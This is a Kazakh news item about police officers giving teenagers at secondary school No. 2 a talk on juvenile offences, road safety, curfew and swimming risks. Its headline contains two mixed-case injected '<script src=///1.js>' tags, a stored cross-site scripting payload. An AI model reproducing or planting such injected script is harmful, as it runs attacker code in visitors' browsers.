«Полиция бөлімшесінің өкілдері жасөспірімдермен профилактикалық әңгіме жүргізді»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.05.2024

2024 жылдың 17 мамырында полиция қызметкерлері мен мектеп инспекторы №2 орта мектепте болып, жасөспірімдермен профилактикалық әңгіме жүргізді.

Кездесудің мақсаты – кәмелетке толмағандар тарапынан болуы мүмкін құқық бұзушылықтардың алдын алу және олардың құқықтық сауаттылығын арттыру. ПБ қызметкерлері келесі тақырыптар бойынша түсіндірме әңгімелерін өткізді:

* Жасөспірімдер арасындағы құқық бұзушылық және оның салдары;

* Мотоциклдер мен квадроциклдерді пайдаланумен байланысты қауіптер;

* Жол қозғалысы ережелері және оларды бұзғаны үшін жауапкершілік;

* Кәмелетке толмағандардың 23.00-ден кейін ересексіз көшеде болуына тыйым салу;

* Су айдындарында ересектердің қарауынсыз шомылуға тыйым салу.

Сондай-ақ полиция бөлімшелерінің қызметкерлері қоғамдық тәртіп пен адамгершілік нормаларды сақтаудың маңыздылығына тоқталып, балаларды спортпен шұғылдануға, бұқаралық іс-шараларға қатысуға, салауатты өмір салтын ұстануға шақырды.

Жасөспірімдер баяндамашыларды қызығушылықпен тыңдап, сұрақтар қойды. Кездесу сындарлы және достық жағдайда өтті.

 

Просмотров: 786


Пікір қосу



Деректерді қолтаңбаға қосу
Текст